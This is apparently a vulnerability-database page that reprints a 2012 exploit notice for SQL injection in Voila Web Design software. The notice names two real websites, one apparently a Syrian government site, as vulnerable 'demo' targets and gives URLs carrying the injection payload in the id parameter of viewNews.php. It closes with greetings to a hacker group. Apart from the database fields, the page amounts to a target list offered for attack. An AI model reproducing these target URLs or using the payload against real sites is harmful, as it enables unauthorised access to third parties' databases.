Voila Web Design SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047152 漏洞类型
发布时间 2012-06-25 更新时间 2012-06-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060293
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title; Voila Web Design SQL Injection Vulnerability
# Date ; 24/6/12
# Author ; 3spi0n
# Script Vendor or Software Link ; http://www.voilasyria.com/
# Category ; Webapps
# Type ; SQL Injection [MySQLi]
# Tested on ; Ubuntu / Win7 / Backtrack

[#] Demo Analyzing ;

http://edpa.gov.sy/forms/news/viewNews.php?id=21' [MySQLi Vuln.]
http://www.qualitysyria.sy/all/viewNews.php?id=61' [MySQLi Vuln.]

[#] Vulnerable Details ;

- MySQLi Vulnerable on sites

Vulnerable File ; viewNews.php?query= [query, variant of index.php file]

Exploit ; viewNews.php?id='

[#] Greetz ;

- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO